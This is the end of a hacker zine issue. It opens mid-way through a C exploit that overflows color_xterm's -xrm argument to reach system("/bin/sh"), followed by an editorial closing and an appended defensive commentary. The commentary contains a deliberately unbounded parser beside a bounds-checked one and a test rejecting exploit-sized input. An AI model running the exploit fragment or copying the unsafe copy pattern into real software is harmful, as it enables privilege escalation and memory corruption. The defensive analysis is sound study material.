        *ptr++ = pc;                            /* db->methods->mbfinish */
    buf3[SIZE3 - 1] = 0;

/* Put buf2 and buf3 on the stack */
    setenv("BUFFER", buf2, 1);

/* GetDatabase() in libX11 will do (*db->methods->mbfinish)(db->mbstate) */
    execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1, NULL);
    error("execl");
}

--=< snip >

Well, that's it... funfun... Next month we'll put in something NEW. (:

-= CAU =-

##############################################################################

Phreaking

##############################################################################

Closing

Well, isn't that a pretty Phreaking section? Just had to complain about that again... I can't write the whole zine myself, someone contribute for once. I'd like to thank Variety, Protocol, and MajestiX for contributing recently, and Protocol and MajestiX for contributing repeatedly. Maybe someone else will take their lead and get off their asses and do something useful. That and if I didn't write at least two articles for each issue I might have time to sit down and code something, like maybe some more HackIt! modules.
By the way, The HackIt! Project now has its own section on the CAUGHQ website... look for it under the 'Projects' section.

Well, that's it for this month...

I)ruid

##############################################################################

____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground
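A note on the Exploit of the Month above, with an added example that is neither from the zine nor from Solar Designer's cx.c. The header of cx.c says it is written for a non-executable stack, and the last comment in it shows why that mitigation does not matter here: the overflowed bytes are never executed, they only overwrite a pointer so that libX11's own call through db->methods->mbfinish lands in system() with "/bin/sh" as its argument. What actually closes the bug class is a bounded copy. The code below is a simplified, hypothetical stand-in for a "-xrm name: value" handler (the names rsrc_parse_unsafe, rsrc_parse_safe, rejects_cx_sized_arg and the field sizes are assumptions for illustration, not libX11's real code): the overflowing form is shown beside the bounds-checked form, and the checked form is then fed an argument of the same length cx.c passes (SIZE1, 1200 bytes, filled with constructed filler rather than the exploit's pointer values) to confirm it is rejected before anything is written.

```c
#include <stdio.h>
#include <string.h>

/* Field sizes are assumptions for this illustration, not libX11's. */
#define NAME_MAX_LEN  64
#define VALUE_MAX_LEN 256
#define CX_ARG_LEN    1200   /* SIZE1 in cx.c: length of the -xrm argument */

struct resource {
    char name[NAME_MAX_LEN];
    char value[VALUE_MAX_LEN];
};

/*
 * Overflowing form (hypothetical, modelled on the bug class): the copy
 * lengths come from the caller's string, not from the destination sizes,
 * so a long name or value runs past the fields into whatever follows the
 * struct. cx.c's payload depends on exactly this kind of write reaching
 * a pointer. Kept for comparison only; never called on untrusted input.
 */
int rsrc_parse_unsafe(const char *arg, struct resource *out)
{
    const char *colon = strchr(arg, ':');
    if (colon == NULL)
        return -1;
    memcpy(out->name, arg, (size_t)(colon - arg));   /* unbounded */
    out->name[colon - arg] = '\0';
    strcpy(out->value, colon + 1);                   /* unbounded */
    return 0;
}

/*
 * Hardened form: the separator must be present, both lengths are checked
 * against the destination sizes before any byte is written, and a
 * rejected argument leaves *out untouched. Returns 0 on success, -1 when
 * the argument is malformed or too long for the fields.
 */
int rsrc_parse_safe(const char *arg, struct resource *out)
{
    const char *colon = strchr(arg, ':');
    const char *val;
    size_t name_len, value_len;

    if (colon == NULL)
        return -1;
    name_len = (size_t)(colon - arg);

    /* X resource syntax allows blanks between the colon and the value */
    val = colon + 1;
    while (*val == ' ' || *val == '\t')
        val++;
    value_len = strlen(val);

    /* one byte of each field is reserved for the terminator */
    if (name_len == 0 || name_len >= NAME_MAX_LEN)
        return -1;
    if (value_len >= VALUE_MAX_LEN)
        return -1;

    memcpy(out->name, arg, name_len);
    out->name[name_len] = '\0';
    memcpy(out->value, val, value_len);
    out->value[value_len] = '\0';
    return 0;
}

/*
 * Feeds three constructed 1200-byte arguments (cx.c's SIZE1) to the
 * bounded parser: no separator, separator at the end (over-long name),
 * separator at the start (over-long value). Returns 1 if every variant
 * is rejected, 0 if any is accepted.
 */
int rejects_cx_sized_arg(void)
{
    static char arg[CX_ARG_LEN + 1];
    struct resource r;
    int rejected = 1;

    memset(arg, 'x', CX_ARG_LEN);          /* constructed filler, not cx.c's data */
    arg[CX_ARG_LEN] = '\0';
    if (rsrc_parse_safe(arg, &r) == 0) rejected = 0;

    arg[CX_ARG_LEN - 1] = ':';             /* name of 1199 bytes */
    if (rsrc_parse_safe(arg, &r) == 0) rejected = 0;

    arg[CX_ARG_LEN - 1] = 'x';
    arg[1] = ':';                          /* value of 1198 bytes */
    if (rsrc_parse_safe(arg, &r) == 0) rejected = 0;

    return rejected;
}

int main(void)
{
    struct resource r;
    const char *sample = "color_xterm*background: black";   /* constructed */

    if (rsrc_parse_safe(sample, &r) == 0)
        printf("accepted: name=\"%s\" value=\"%s\"\n", r.name, r.value);
    printf("cx.c-sized argument rejected: %s\n",
           rejects_cx_sized_arg() ? "yes" : "no");
    return 0;
}
```

The point of the length checks coming before the first memcpy() is that a rejected argument cannot leave a partially written struct behind; the unsafe form has no point at which the destination size is consulted at all, which is why a non-executable stack, which only governs what the processor may execute, never enters into it.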